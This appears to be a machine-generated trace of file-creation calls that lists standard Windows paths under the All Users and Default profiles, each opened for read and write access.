Create	C:\Users\All Users\Microsoft Help\MS.WINWORD.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\nslist.hxl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Mozilla\logs\maintenanceservice-install.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\42D5BEC7DDFBD49E76467529CBC2868987BF8460\packages\Patch\x64\Windows6.1-KB2999226-x64.msu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\Windows6.1-KB2999226-x64.msu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\vcredist_x64.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\packages\vcRuntimeMinimum_x86\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\packages\vcRuntimeAdditional_x86\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\VC_redist.x64.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\vcredist_x86.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f}\VC_redist.x86.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Sun\Java\Java Update\jaureglist.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\IconCache.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\1NBUR4HR\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\6ASVN7J7\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\D68G7BIJ\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\KQMHSVKD\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.bak	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\01_Music_auto_rated_at_5_stars.wpl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\02_Music_added_in_the_last_month.wpl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\03_Music_rated_at_4_or_5_stars.wpl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\04_Music_played_in_the_last_month.wpl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\05_Pictures_taken_in_the_last_month.wpl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\06_Pictures_rated_4_or_5_stars.wpl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\07_TV_recorded_in_the_last_week.wpl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\08_Video_rated_at_4_or_5_stars.wpl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\09_Music_played_the_most.wpl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\10_All_Music.wpl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\11_All_Pictures.wpl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\12_All_Video.wpl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\History\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\UsrClass.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG2	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
